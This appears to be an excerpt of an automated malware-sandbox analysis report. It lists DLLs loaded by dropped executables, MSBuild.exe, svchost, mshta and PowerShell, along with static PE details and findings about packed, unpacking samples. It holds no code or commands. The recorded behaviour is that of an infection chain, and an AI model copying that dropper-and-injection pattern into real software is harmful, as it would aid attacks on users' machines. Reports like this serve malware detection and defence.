Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000001C.00000003.1556143577.00000000061DA000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000000.1553491361.0000000000433000.00000002.00000001.01000000.00000015.sdmp, apple.exe, 0000001C.00000003.1556649104.00000000061E4000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000002.1561139167.0000000000433000.00000002.00000001.01000000.00000015.sdmp
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Unpacked PE file: 10.2.Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Unpacked PE file: 11.2.Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 12.2.rapes.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW;
